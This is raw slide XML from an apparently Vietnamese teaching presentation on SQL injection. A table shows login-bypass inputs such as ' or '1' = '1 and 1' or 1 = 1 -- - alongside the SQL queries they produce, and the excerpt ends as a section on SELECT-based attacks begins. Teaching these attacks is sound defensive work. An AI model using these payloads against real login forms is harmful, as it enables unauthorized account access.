            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>đăng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947615" y="169491"/>
            <a:ext cx="7262798" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Tấn công vượt qua kiểm tra đăng nhập (username/password)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="1"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072536543"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="528009" y="1076812"/>
          <a:ext cx="8102010" cy="3219750"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{9064341A-4EE2-4885-B17D-4086B769AF5B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1574025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2885453903"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1609159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4021132910"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4918826">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2109721711"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="298652">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400" b="1" i="1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="33939" marR="33939" marT="33939" marB="33939">
                    <a:solidFill>
                      <a:schemeClr val="accent3">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400" b="1" i="1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="33939" marR="33939" marT="33939" marB="33939">
                    <a:solidFill>
                      <a:schemeClr val="accent3">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400" b="1" i="1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Câu lệnh SQL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="33939" marR="33939" marT="33939" marB="33939">
                    <a:solidFill>
                      <a:schemeClr val="accent3">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3529985417"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="682176">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Nhập ký tự bất kỳ</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>' or '1' = '1</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Select * from TAIKHOAN where TenDangNhap = ''and MatKhau = '' or '1' = '1'</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1618291736"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="682176">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Nhập ký tự bất kỳ</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>' or 1='1</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Select * from TAIKHOAN where TenDangNhap = ''and MatKhau = '' or 1 = '1'</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4014823140"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="682176">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>1' or 1 = 1 --</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Nhập ký tự bất kỳ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Select * from TAIKHOAN where TenDangNhap = '1' or 1 = 1 -- -'and MatKhau = ''</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1309151758"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="682176">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Nhập ký tự bất kỳ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>1' or 1 = 1 --</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="33939" marR="33939" marT="33939" marB="33939"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="vi-VN" sz="1400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Select * from TAIKHOAN where TenDangNhap = '' and MatKhau = '1' or 1 = 1 -- -'</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="33939" marR="33939" marT="33939" marB="33939"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3378148269"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12153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671786" y="1118027"/>
            <a:ext cx="3477592" cy="3273398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>phức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tạp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Để </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thực hiện được kiểu tấn công này, kẻ tấn công phải có khả năng hiểu và lợi dụng các sơ hở trong các thông báo lỗi từ hệ thống để dò tìm các điểm yếu khởi đầu cho việc tấn công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947615" y="307803"/>
            <a:ext cx="7262798" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công sử dụng câu lệnh SELECT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Sql injection là gì ? Tìm hiểu cách thức tấn công SQL Injection ! - Blogger  Jam Việ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38" y="995083"/>
            <a:ext cx="3955169" cy="3273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55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Shape 486"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530198" y="445674"/>
            <a:ext cx="8022131" cy="4525896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Xét một ví dụ rất thường gặp trong các website về tin tức. Thông thường, sẽ có một trang nhận ID của tin cần hiển thị rồi sau đó truy vấn nội dung của tin có ID này.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> - Mã </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
